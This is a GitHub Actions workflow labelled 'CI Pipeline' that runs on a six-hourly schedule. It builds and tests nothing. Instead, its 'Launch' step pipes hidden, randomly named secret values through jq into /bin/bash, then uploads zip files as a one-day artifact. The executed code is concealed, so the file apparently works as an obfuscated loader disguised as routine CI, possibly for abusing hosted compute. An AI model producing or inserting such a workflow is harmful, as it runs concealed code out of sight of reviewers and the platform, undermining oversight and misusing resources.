name: CI Pipeline
on:
  workflow_dispatch:

  schedule:
    - cron: '15 0,6,12,18 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  ci:
    runs-on: ubuntu-latest
    timeout-minutes: 360
    steps:
      - uses: actions/checkout@v4
      - name: Launch
        env:
          zkvxa3473: ${{ secrets.zkvxa3473 }}
        run: |
          printf '%s' "$zkvxa3473" | jq -r .rbpx5 | /bin/bash
          printf '%s' "$sjqyx4708" | jq -r .ww5424 | /bin/bash
          printf '%s' "$inieq79009" | jq -r .i9 | /bin/bash
          echo $hxayd26998 | jq -r .hns5000 | /bin/bash
          echo $g52563 | jq -r .wht396 | /bin/bash
          printf '%s' "$pls86828" | jq -r .njdxj7164 | /bin/bash
          printf '%s' "$qva3" | jq -r .p45 | /bin/bash
          printf '%s' "$idwq5042" | jq -r .o64552 | /bin/bash

      - name: Save artifact
        uses: actions/upload-artifact@v4
        with:
          name: 1ToxUkjo
          path: "*.zip"
          retention-days: 1
